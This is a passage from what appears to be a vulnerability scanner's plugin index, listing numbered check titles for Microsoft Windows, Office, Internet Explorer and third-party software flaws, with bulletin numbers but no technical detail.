Vulnerabilities (979559) [902033] Microsoft Windows '.ani' file Denial of Service vulnerability [901305] Microsoft Windows IP-HTTPS Component Security Feature Bypass Vulnerability (2765809) [901304] Microsoft Windows File Handling Component Remote Code Execution Vulnerability (2758857) [901301] Microsoft Windows Kerberos Denial of Service Vulnerability (2743555) [901212] Microsoft Windows DirectPlay Remote Code Execution Vulnerability (2770660) [901211] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2720573) [901209] Microsoft Windows Media Center Remote Code Execution Vulnerabilities (2604926) [901205] Microsoft Windows Components Remote Code Execution Vulnerabilities (2570947) [901193] Microsoft Windows Media Remote Code Execution Vulnerabilities (2510030) [901169] Microsoft Windows Address Book Remote Code Execution Vulnerability (2423089) [901164] Microsoft Windows SChannel Denial of Service Vulnerability (2207566) [901163] Microsoft Windows Media Player Remote Code Execution Vulnerability (2378111)) [901150] Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability(2347290) [901140] Microsoft Windows SMB Code Execution and DoS Vulnerabilities (982214) [901119] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (980218) [901102] Microsoft Windows Media Services Remote Code Execution Vulnerability (980858) [901065] Microsoft Windows IAS Remote Code Execution Vulnerability (974318) [901064] Microsoft Windows ADFS Remote Code Execution Vulnerability (971726) [901063] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [901012] Microsoft Windows Media Format Remote Code Execution Vulnerability (973812) [900965] Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability [900963] Microsoft Windows Kernel Privilege Escalation Vulnerability (971486) [900957] Microsoft Windows Patterns & Practices EntLib DOS Vulnerability [900956] Microsoft Windows Patterns & Practices EntLib Version Detection [900908] Microsoft Windows Message Queuing Privilege Escalation Vulnerability (971032) [900907] Microsoft Windows AVI Media File Parsing Vulnerabilities (971557) [900886] Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (969947) [900881] Microsoft Windows Indexing Service ActiveX Vulnerability (969059) [900880] Microsoft Windows ATL COM Initialization Code Execution Vulnerability (973525) [900879] Microsoft Windows Media Player ASF Heap Overflow Vulnerability (974112) [900877] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [900876] Microsoft Windows CryptoAPI X.509 Spoofing Vulnerabilities (974571) [900873] Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness (971888) [900838] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (967723) [900814] Microsoft Windows WINS Remote Code Execution Vulnerability (969883) [900757] Microsoft Windows Media Player '.AVI' File DOS Vulnerability [900740] Microsoft Windows Kernel Could Allow Elevation of Privilege (977165) [900568] Microsoft Windows Search Script Execution Vulnerability (963093) [900465] Microsoft Windows DNS Memory Corruption Vulnerability - Mar09 [900404] Microsoft Windows RTCP Unspecified Remote DoS Vulnerability [900336] Microsoft Windows Media Player MID File Integer Overflow Vulnerability [900297] Microsoft Windows Kernel Denial of Service Vulnerability (2556532) [900296] Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) [900295] Microsoft Windows DNS Server Remote Code Execution Vulnerability (2562485) [900281] Microsoft IE Developer Tools WMITools and Windows Messenger ActiveX Control Vulnerability (2508272) [900280] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2508429) [900266] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (2424434) [900263] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (2296199) [900248] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (981997) [900241] Microsoft Outlook Express and Windows Mail Remote Code Execution Vulnerability (978542) [900240] Microsoft Exchange and Windows SMTP Service Denial of Service Vulnerability (981832) [900237] Microsoft Windows Authentication Verification Remote Code Execution Vulnerability (981210) [900236] Microsoft Windows Kernel Could Allow Elevation of Privilege (979683) [900235] Microsoft Windows Media Player Could Allow Remote Code Execution (979402) [900232] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561) [900230] Microsoft Windows SMB Server Multiple Vulnerabilities (971468) [900227] Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) [900178] Microsoft Windows 'UnhookWindowsHookEx' Local DoS Vulnerability [900173] Microsoft Windows Media Player Version Detection [900172] Microsoft Windows Media Player 'MIDI' or 'DAT' File DoS Vulnerability [900108] Microsoft Windows NSlookup.exe Remote Code Execution Vulnerability [803007] Microsoft Windows Minimum Certificate Key Length Spoofing Vulnerability (2661254) [802888] Microsoft Windows Media Service Handshake Sequence DoS Vulnerability [802634] Microsoft Windows Unauthorized Digital Certificates Spoofing Vulnerability (2718704) [802500] Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability [802426] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2647518) [802383] Microsoft Windows Color Control Panel Privilege Escalation Vulnerability [802379] Microsoft Windows Kernel 'win32k.sys' Memory Corruption Vulnerability [802260] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [802140] Microsoft Explorer HTTPS Sessions Multiple Vulnerabilities (Windows) [802136] Microsoft Windows Insecure Library Loading Vulnerability (2269637) [801991] Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability [801966] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937) [801914] Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability [801719] Microsoft Windows CSRSS CSRFinalizeContext Local Privilege Escalation Vulnerability (930178) [801718] Microsoft Windows Vista Information Disclosure Vulnerability (931213) [801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [801716] Microsoft Outlook Express/Windows Mail MHTML URI Handler Information Disclosure Vulnerability (929123) [801713] Microsoft Outlook Express And Windows Mail NNTP Protocol Heap Buffer Overflow Vulnerability (941202) [801706] Microsoft Windows TCP/IP Remote Code Execution Vulnerabilities (941644) [801705] Microsoft Windows TCP/IP Denial of Service Vulnerability (946456) [801701] Microsoft Windows DNS Client Service Response Spoofing Vulnerability (945553) [801669] Microsoft Windows IIS FTP Server DOS Vulnerability [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability [801580] Microsoft Windows Fax Cover Page Editor BOF Vulnerabilities [801527] Microsoft Windows 32-bit Platforms Unspecified vulnerabilities [801487] Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693) [801486] Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability (950760) [801484] Microsoft Windows IPsec Policy Processing Information Disclosure Vulnerability (953733) [801483] Microsoft Windows Search Remote Code Execution Vulnerability (959349) [801482] Microsoft Windows ASP.NET Denial of Service Vulnerability(970957) [801479] Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145) [801457] Microsoft Windows Address Book Insecure Library Loading Vulnerability [801456] Microsoft Windows Progman Group Converter Insecure Library Loading Vulnerability [801333] Microsoft Windows Kernel 'win32k.sys' Multiple DOS Vulnerabilities [801090] Microsoft Windows Indeo Codec Multiple Vulnerabilities [800862] Microsoft Windows Kernel win32k.sys Privilege Escalation Vulnerability [800687] Microsoft Windows Server 2003 OpenType Font Engine DoS Vulnerability [800577] Microsoft Windows Server 2003 win32k.sys DoS Vulnerability [800504] Microsoft Windows XP SP3 denial of service vulnerability [800480] Microsoft Windows Media Player '.mpg' Buffer Overflow Vulnerability [800466] Microsoft Windows TLS/SSL Spoofing Vulnerability (977377) [800442] Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability [800332] Microsoft Windows Live Messenger Information Disclosure Vulnerability [800331] Microsoft Windows Live Messenger Client Version Detection [800328] Integer Overflow vulnerability in Microsoft Windows Media Player [800310] Microsoft Windows Media Services nskey.dll ActiveX BOF Vulnerability [800023] Microsoft Windows Image Color Management System Code Execution Vulnerability (952954) [102059] Microsoft Windows Vector Markup Language Buffer Overflow (938127) [102055] Microsoft Windows GDI Multiple Vulnerabilities (925902) [102053] Microsoft Windows Vector Markup Language Vulnerabilities (929969) [100624] Microsoft Windows SMTP Server DNS spoofing vulnerability [100596] Microsoft Windows SMTP Server MX Record Denial of Service Vulnerability [100283] Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability [90024] Windows Vulnerability in Microsoft Jet Database Engine [903037] Microsoft JScript and VBScript Engines Remote Code Execution Vulnerability (2706045) [903030] Google Chrome Multiple Vulnerabilities(02) - May 12 (Windows) [903029] Apple Safari Multiple Vulnerabilities - Oct 2011 (Windows) [903026] Microsoft Office Remote Code Execution Vulnerabilities (2663830) [903017] Microsoft Office Remote Code Execution Vulnerability (2639185) [903014] Adobe Flash Player/Air Code Execution and DoS Vulnerabilities (Windows) [903007] Google Chrome Full Sandbox Escape and Code Execution Vulnerability (Windows) [903004] Google Chrome Multiple Vulnerabilities (Windows) - Mar 12 [903003] GOM Media Player 'Open URL' Feature Unspecified Vulnerability (Windows) [903002] GOM Media Player 'AVI' File Unspecified Vulnerability (Windows) [903000] Microsoft Expression Design Remote Code Execution Vulnerability (2651018) [902934] Microsoft .NET Framework Remote Code Execution Vulnerability (2745030) [902932] Microsoft Internet Explorer Multiple Use-After-Free Vulnerabilities (2761451) [902931] Microsoft Office Remote Code Execution Vulnerabilities - 2720184 (Mac OS X) [902930] Microsoft Office Remote Code Execution Vulnerabilities (2720184) [902923] Microsoft Internet Explorer Multiple Vulnerabilities (2722913) [902922] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2723135) [902921] Microsoft Office Visio/Viewer Remote Code Execution Vulnerability (2733918) [902920] Microsoft Office Remote Code Execution Vulnerability (2731879) [902919] Microsoft SharePoint Privilege Elevation Vulnerabilities (2663841) [902917] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2709162) [902914] Microsoft IIS GET Request Denial of Service Vulnerability [902913] Microsoft Office Remote Code Execution Vulnerabilities-2663830 (Mac OS X) [902912] Microsoft Office Word Remote Code Execution Vulnerability-2680352 (Mac OS X) [902911] Microsoft Office Word Remote Code Execution Vulnerability (2680352) [902910] Microsoft Office Visio Viewer Remote Code Execution Vulnerability (2597981) [902907] Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2641653) [902903] Google Chrome Multiple Vulnerabilities - Jan12 (Windows) [902842] Microsoft Lync Remote Code Execution Vulnerabilities (2707956) [902841] Microsoft .NET Framework Remote Code Execution Vulnerability (2706726) [902839] Microsoft FrontPage Server Extensions MS-DOS Device Name DoS Vulnerability [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows) [902836] PHP 'com_print_typeinfo()' Remote Code Execution Vulnerability (Windows) [902833] Microsoft .NET Framework Remote Code Execution Vulnerability (2693777) [902832] MS Security Update For Microsoft Office, .NET Framework, and Silverlight (2681578) [902828] Microsoft .NET Framework Remote Code Execution Vulnerability (2671605) [902818] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902817] Microsoft Visual Studio Privilege Elevation Vulnerability (2651019) [902811] Microsoft .NET Framework and Microsoft Silverlight Remote Code Execution Vulnerabilities (2651026) [902810] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2660465) [902808] IBM Lotus Symphony Image Object Integer Overflow Vulnerability (Windows) [902798] Microsoft SMB Signing Enabled and Not Required At Server [902797] Microsoft SMB Signing Information Disclosure Vulnerability [902796] Microsoft IIS IP Address/Internal Network Name Disclosure Vulnerability [902792] MS Windows Indeo Codec Remote Code Execution Vulnerability (2661637) [902791] MS Windows Color Control Panel Remote Code Execution Vulnerability (2643719) [902786] Oracle VM VirtualBox Multiple Unspecified Vulnerabilities (Windows) [902785] Microsoft AntiXSS Library Information Disclosure Vulnerability (2607664) [902781] Windows Media Player Denial Of Service Vulnerability [902775] Mozilla Products Multiple Vulnerabilities - Dec 11 (Windows) [902774] Mozilla Products DOMAttrModified Memory Corruption Vulnerability (Windows) [902770] FFFTP Untrusted Search Path Vulnerability (Windows) - Dec 11 [902768] MS Windows Active Directory Remote Code Execution Vulnerability (2640045) [902767] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902765] Adobe Flex SDK 'SWF' Files Cross-Site Scripting Vulnerability (Windows) [902760] ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows) [902746] Microsoft Active Accessibility Remote Code Execution Vulnerability (2623699) [902738] Adobe Flash Player Multiple Vulnerabilities September-2011 (Windows) [902727] Microsoft Office Excel Remote Code Execution Vulnerabilities (2587505) [902709] Adobe Air and Flash Player Multiple Vulnerabilities August-2011 (Windows) [902708] Microsoft Remote Desktop Protocol Denial of Service Vulnerability (2570222) [902705] VLC Media Player '.AVI' File BOF Vulnerability (Windows) [902704] VLC Media Player '.RM' File BOF Vulnerability (Windows) [902696] Microsoft Internet Explorer Multiple Vulnerabilities (2761465) [902692] Microsoft Office Excel ReadAV Arbitrary Code Execution Vulnerability [902689] Microsoft SQL Server Report Manager Cross Site Scripting Vulnerability (2754849) [902688] Microsoft System Center Configuration Manager XSS Vulnerability (2741528) [902686] Microsoft Internet Explorer Multiple Vulnerabilities (2719177) [902683] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2685939) [902682] Microsoft Internet Explorer Multiple Vulnerabilities (2699988) [902679] Google SketchUp '.SKP' File Remote Code Execution Vulnerability (Windows) [902678] Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X) [902670] Microsoft Internet Explorer Multiple Vulnerabilities (2675157) [902669] Windows Authenticode Signature Remote Code Execution Vulnerability (2653956) [902666] Opera Multiple Vulnerabilities - March12 (Windows) [902663] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902662] MicroSoft SMB Server Trans2 Request Remote Code Execution Vulnerability [902660] Microsoft SMB Transaction Parsing Remote Code Execution Vulnerability [902658] Microsoft RDP Server Private Key Information Disclosure Vulnerability [902657] Windows ClickOnce Application Installer Remote Code Execution Vulnerability (2584146) [902653] MS Windows C Run-Time Library Remote Code Execution Vulnerability (2654428) [902649] Microsoft Internet Explorer Multiple Vulnerabilities (2647516) [902645] Google Chrome Multiple Vulnerabilities - December11 (Windows) [902643] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2620712) [902642] Microsoft Internet Explorer Multiple Vulnerabilities (2618444) [902638] Apple iTunes Remote Code Execution Vulnerability (Windows) [902635] Google Chrome V8 Remote Code Execution Vulnerability (Windows) [902626] Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048) [902625] Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858) [902614] Google Chrome Secure Cookie Security Bypass Vulnerability (Windows) [902613] Microsoft Internet Explorer Multiple Vulnerabilities (2559049) [902603] VLC Media Player XSPF Playlist Integer Overflow Vulnerability (Windows) [902581] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2604930) [902580] Microsoft Host Integration Server Denial of Service Vulnerabilities (2607670) [902567] Microsoft Office Remote Code Execution Vulnerabilites (2587634) [902561] McAfee SaaS Endpoint Protection Version Detection (Windows) [902552] Microsoft .NET Framework Chart Control Information Disclosure Vulnerability (2567943) [902551] Microsoft .NET Framework Information Disclosure Vulnerability (2567951) [902549] Oracle VM VirtualBox Unspecified Vulnerability (Windows) [902546] IBM Informix Dynamic Server Oninit Remote Code Execution Vulnerability (Windows) [902545] IBM Informix Dynamic Server Version Detection (Windows) [902538] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2555917) [902529] ejabberd Version Detection (Windows) [902527] ejabberd XML Parsing Denial of Service Vulnerability (Windows) [902525] Oracle Java SE Multiple Unspecified Vulnerabilities 01 - June11 (Windows) [902524] Oracle Java SE Multiple Unspecified Vulnerabilities - June11 (Windows) [902523] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2514842) [902522] Microsoft .NET Framework Remote Code Execution Vulnerability (2538814) [902518] Microsoft .NET Framework Security Bypass Vulnerability [902502] Microsoft .NET Framework Remote Code Execution Vulnerability (2484015) [902501] Microsoft JScript and VBScript Scripting Engines Remote Code Execution Vulnerability (2514666) [902499] MS Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2646524) [902496] Microsoft Office IME (Chinese) Privilege Elevation Vulnerability (2652016) [902495] Microsoft Office Remote Code Execution Vulnerability (2590602) [902494] Microsoft Office Excel Remote Code Execution Vulnerability (2640241) [902493] Microsoft Publisher Remote Code Execution Vulnerabilities (2607702) [902492] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2639142) [902486] Windows Mail and Windows Meeting Space Remote Code Execution Vulnerability (2620704) [902485] Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2617657) [902483] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902482] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability (2592799) [902464] Microsoft Visio Remote Code Execution Vulnerabilities (2560978) [902455] Microsoft Visio Remote Code Execution Vulnerability (2560847) [902445] Microsoft XML Editor Information Disclosure Vulnerability (2543893) [902444] MS Windows Threat Management Gateway Firewall Client Remote Code Execution Vulnerability (2520426 [902443] Microsoft Internet Explorer Multiple Vulnerabilities (2530548) [902442] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability [902441] Windows MHTML Information Disclosure Vulnerability (2544893) [902430] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2545814) [902424] MS Windows Ancillary Function Driver Privilege Elevation Vulnerabilities (2645640) [902423] Microsoft Office Visio Viewer Remote Code Execution Vulnerabilities (2663510) [902411] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2489283) [902410] Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279) [902409] Windows MHTML Information Disclosure Vulnerability (2503658) [902408] Windows Fax Cover Page Editor Remote Code Execution Vulnerability (2527308) [902400] Adobe Products Remote Memory Corruption Vulnerability (Windows) [902399] LibreOffice LWP File Processing Multiple Buffer Overflow Vulnerabilities (Windows) [902398] LibreOffice Version Detection (Windows) [902395] Microsoft Bluetooth Stack Remote Code Execution Vulnerability (2566220) [902392] Google Chrome Multiple Vulnerabilities (Windows) - June 11 [902387] Adobe Reader/Acrobat Security Bypass Vulnerability (Windows) [902382] Google Chrome Multiple Vulnerabilities May11 (Windows) [902379] Adobe Reader/Acrobat Memory Corruption Vulnerability (Windows) [902378] Microsoft Office Excel Remote Code Execution Vulnerabilities (2537146) [902373] Adobe Audition '.ses' Multiple Buffer Overflow Vulnerabilities (Windows) [902365] Microsoft GDI+ Remote Code Execution Vulnerability (2489979) [902364] Microsoft Office Remote Code Execution Vulnerabilites (2489293) [902363] Windows OpenType Compact Font Format (CFF) Driver Remote Code Execution Vulnerability (2507618) [902353] Oracle Java SE Code Execution Vulnerabilities (Windows) [902351] Microsoft Groove Remote Code Execution Vulnerability (2494047) [902350] Oracle Java SE Code Execution Vulnerability (Windows-01) [902349] Oracle Java SE Code Execution Vulnerability (Windows) [902347] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902344] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902341] VLC Media Player USF and Text Subtitles Decoders BOF Vulnerabilities (Windows) [902340] VLC Media Player '.mkv' Code Execution Vulnerability (Windows) [902336] Microsoft JScript and VBScript Scripting Engines Information Disclosure Vulnerability (2475792) [902334] Vulnerability in Windows Shell Graphics Processing Could Allow Remote Code Execution (2483185) [902333] Tor Unspecified Heap Based Buffer Overflow Vulnerability (Windows) [902325] Microsoft Internet Explorer 'CSS Import Rule' Use-after-free Vulnerability [902324] Microsoft SharePoint Could Allow Remote Code Execution Vulnerability (2455005) [902323] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (981957) [902322] Windows Local Procedure Call Privilege Elevation Vulnerability (2360937) [902319] Microsoft Foundation Classes Could Allow Remote Code Execution Vulnerability (2387149) [902306] Mozilla Products 'js_InitRandom' Information Disclosure Vulnerability (Windows) [902305] Mozilla Firefox Information Disclosure Vulnerability (Windows) [902303] Adobe Products Content Code Execution Vulnerability (Windows) [902301] Windows Client/Server Runtime Subsystem Privilege Elevation Vulnerability (2121546) [902293] Metasploit Framework Version Detection (Windows) [902288] Microsoft Kerberos Privilege Escalation Vulnerabilities (2496930) [902287] Microsoft Visio Remote Code Execution Vulnerabilities (2451879) [902285] Microsoft Internet Explorer Information Disclosure Vulnerability (2501696) [902278] MS Windows ICSW Remote Code Execution Vulnerability (2443105) [902275] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2436673) [902274] Microsoft Publisher Remote Code Execution Vulnerability (2292970) [902265] Microsoft Office Word Remote Code Execution Vulnerabilities (2293194) [902264] Microsoft Office Excel Remote Code Execution Vulnerabilities (2293211) [902255] Microsoft Visual Studio Insecure Library Loading Vulnerability [902254] Microsoft Office Products Insecure Library Loading Vulnerability [902250] Microsoft Word 2003 'MSO.dll' Null Pointer Dereference Vulnerability [902246] Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability [902243] Microsoft Outlook TNEF Remote Code Execution Vulnerability (2315011) [902242] Mozilla Products Insecure Library Loading Vulnerability (Windows) [902239] Wireshark File Opening Insecure Library Loading Vulnerability (Windows) [902238] Skype Insecure Library Loading Vulnerability (Windows) [902230] Microsoft .NET Common Language Runtime Remote Code Execution Vulnerability (2265906) [902229] Microsoft Window MPEG Layer-3 Remote Code Execution Vulnerability (2115168) [902228] Microsoft Office Word Remote Code Execution Vulnerabilities (2269638) [902217] Microsoft Outlook SMB Attachment Remote Code Execution Vulnerability (978212) [902210] Microsoft IE cross-domain IFRAME gadgets keystrokes steal Vulnerability [902204] Mozilla Products Multiple Vulnerabilities june-10 (Windows) [902203] Opera Browser Multiple Vulnerabilities (Windows) [902197] Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows) [902196] Wireshark SMB dissector Denial of Service Vulnerability (Windows) [902195] Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows) [902193] Microsoft .NET Framework XML HMAC Truncation Vulnerability (981343) [902192] Microsoft Office COM Validation Remote Code Execution Vulnerability (983235) [902191] Microsoft Internet Explorer Multiple Vulnerabilities (982381) [902186] Mozilla Firefox Multiple Denial Of Service vulnerabilities (Windows) [902185] Mozilla Products 'IFRAME' Denial Of Service vulnerability (Windows) [902183] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability [902182] Opera Browser Multiple Denial Of Service Vulnerability (Windows) [902178] Microsoft Visual Basic Remote Code Execution Vulnerability (978213) [902176] Microsoft SharePoint '_layouts/help.aspx' Cross Site Scripting Vulnerability [902167] Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows) [902166] Microsoft Internet Explorer 'neutering' Mechanism XSS Vulnerability [902161] Adobe Acrobat and Reader PDF Handling Multiple Vulnerabilities (Windows) [902159] Microsoft VBScript Scripting Engine Remote Code Execution Vulnerability (980232) [902158] Microsoft Office Publisher Remote Code Execution Vulnerability (981160) [902157] Microsoft 'ISATAP' Component Spoofing Vulnerability (978338) [902156] Microsoft SMB Client Remote Code Execution Vulnerabilities (980232) [902155] Microsoft Internet Explorer Multiple Vulnerabilities (980182) [902151] Microsoft Internet Explorer Denial of Service Vulnerability - Mar10 [902149] Mozilla Products Multiple Vulnerabilities Mar-10 (Windows) [902147] Mozilla Firefox Unspecified Vulnerability Mar-10 (Windows) [902133] Microsoft Office Excel Multiple Vulnerabilities (980150) [902130] Mozilla Products Multiple Vulnerabilities feb-10 (Windows) [902128] Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows) [902120] Google Chrome Multiple Vulnerabilities - (Windows) [902117] Microsoft DirectShow Remote Code Execution Vulnerability (977935) [902116] Microsoft Client/Server Run-time Subsystem Privilege Elevation Vulnerability (978037) [902115] Microsoft Kerberos Denial of Service Vulnerability (977290) [902114] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (975416) [902112] Microsoft SMB Client Remote Code Execution Vulnerabilities (978251) [902098] Novell iPrint Client Multiple Vulnerabilities (windows) [902095] Microsoft Office Excel Remote Code Execution Vulnerability (2269707) [902080] Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593) [902075] XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows) [902073] Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10 [902069] Microsoft SharePoint Privilege Elevation Vulnerabilities (2028554) [902068] Microsoft Office Excel Remote Code Execution Vulnerabilities (2027452) [902060] Cybozu Office Authentication Bypass Vulnerability (Windows) [902045] aMSN session hijack vulnerability (Windows) [902044] aMSN Version Detection (Windows) [902039] Microsoft Visio Remote Code Execution Vulnerabilities (980094) [902038] Microsoft MPEG Layer-3 Codecs Remote Code Execution Vulnerability (977816) [902027] Mozilla Firefox Unspecified Vulnerability (Windows) [902015] Microsoft Paint Remote Code Execution Vulnerability (978706) [901210] Microsoft Office Privilege Elevation Vulnerability - 2721015 (Mac OS X) [901208] Microsoft Internet Explorer Multiple Vulnerabilities (2586448) [901197] Google Chrome multiple vulnerabilities - March 11 (Windows) [901190] Google Chrome Use-After-Free Vulnerability (Windows) [901182] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2479628) [901181] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2476687) [901180] Microsoft Internet Explorer Multiple Vulnerabilities (2482017) [901174] OpenSC Version Detection (Windows) [901173] Windows Backup Manager Remote Code Execution Vulnerability (2478935) [901166] Microsoft Office Remote Code Execution Vulnerabilites (2423930) [901165] Windows Common Control Library Remote Code Execution Vulnerability (2296011) [901162] Microsoft Internet Explorer Multiple Vulnerabilities (2360131) [901161] Microsoft ASP.NET Information Disclosure Vulnerability (2418042) [901153] Google Chrome multiple vulnerabilities Sep-10 (Windows) [901151] Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960) [901145] FreeType Unspecified Vulnerability (Windows) [901144] FreeType Version Detection (Windows) [901143] FreeType Memory Corruption and Buffer Overflow Vulnerabilities (Windows) [901142] FreeType Multiple denial of service vulnerabilities (Windows) [901139] Microsoft Internet Explorer Multiple Vulnerabilities (2183461) [901120] Microsoft IIS Authentication Remote Code Execution Vulnerability (982666) [901097] Microsoft Internet Explorer Multiple Vulnerabilities (978207) [901095] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (972270) [901082] IBM DB2 UDB Multiple Unspecified Vulnerabilities (Windows) [901069] Microsoft Office Project Remote Code Execution Vulnerability (967183) [901047] MS Windows License Logging Server Remote Code Execution Vulnerability (974783) [901041] Microsoft Internet Explorer Multiple Code Execution Vulnerabilities (974455) [901039] Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682) [900973] Microsoft Office Word Remote Code Execution Vulnerability (976307) [900964] Microsoft .NET Common Language Runtime Code Execution Vulnerability (974378) [900944] Microsoft IIS FTP Server 'ls' Command DOS Vulnerability [900929] Microsoft JScript Scripting Engine Remote Code Execution Vulnerability (971961) [900898] Microsoft Internet Explorer 'XSS Filter' XSS Vulnerabilities - Nov09 [900897] Microsoft Internet Explorer PDF Information Disclosure Vulnerability - Nov09 [900891] Microsoft Internet Denial Of Service Vulnerability - Nov09 [900887] Microsoft Office Excel Multiple Vulnerabilities (972652) [900878] Microsoft Products GDI Plus Code Execution Vulnerabilities (957488) [900874] Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) [900863] Microsoft Internet Explorer 'window.print()' DOS Vulnerability [900837] Microsoft DHTML Editing Component ActiveX Remote Code Execution Vulnerability (956844) [900836] Microsoft Internet Explorer Address Bar Spoofing Vulnerability [900826] Microsoft Internet Explorer 'location.hash' DOS Vulnerability [900813] Microsoft Remote Desktop Connection Remote Code Execution Vulnerability (969706) [900809] Microsoft Visual Studio ATL Remote Code Execution Vulnerability (969706) [900808] Microsoft Visual Products Version Detection [900799] Ruby Interpreter Version Detection (Windows) [900752] XnView DICOM Parsing Integer Overflow Vulnerability (Windows) [900741] Microsoft Internet Explorer Information Disclosure Vulnerability Feb10 [900725] Ruby Interpreter Heap Overflow Vulnerability (Windows) - Dec09 [900724] Windows XP 'SPI_GETDESKWALLPAPER' DoS Vulnerability [900711] Microsoft IIS WebDAV Remote Authentication Bypass Vulnerability [900690] Microsoft Virtual PC/Server Privilege Escalation Vulnerability (969856) [900689] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (961371)) [900670] Microsoft Office Excel Remote Code Execution Vulnerabilities (969462) [900669] Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537) [900589] Microsoft ISA Server Privilege Escalation Vulnerability (970953) [900588] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900567] Microsoft IIS Security Bypass Vulnerability (970483) [900566] Microsoft Active Directory LDAP Remote Code Execution Vulnerability (969805) [900479] PostgreSQL Version Detection (Windows) [900476] Microsoft Excel Remote Code Execution Vulnerabilities (968557) [900461] Microsoft MSN Live Messneger Denial of Service Vulnerability [900445] Microsoft Autorun Arbitrary Code Execution Vulnerability (08-038) [900400] Microsoft Internet Explorer Unicode String DoS Vulnerability [900391] Microsoft Office Publisher Remote Code Execution Vulnerability (969516) [900366] Microsoft Internet Explorer Web Script Execution Vulnerabilites [900365] Microsoft Office Word Remote Code Execution Vulnerabilities (969514) [900337] Microsoft Internet Explorer Denial of Service Vulnerability - Apr09 [900328] Microsoft Internet Explorer Remote Code Execution Vulnerability (963027) [900322] Tor Replay Attack Vulnerability (Windows) [900314] Microsoft XML Core Service Information Disclosure Vulnerability [900303] Microsoft Internet Explorer HTML Form Value DoS Vulnerability [900302] MS Windows taskmgr.exe Information Disclosure Vulnerability [900299] Microsoft Report Viewer Information Disclosure Vulnerability (2578230) [900298] MS Windows Remote Access Service NDISTAPI Driver Privilege Elevation Vulnerability (2566454) [900294] Microsoft Data Access Components Remote Code Execution Vulnerabilities (2560656) [900288] Microsoft Distributed File System Remote Code Execution Vulnerabilities 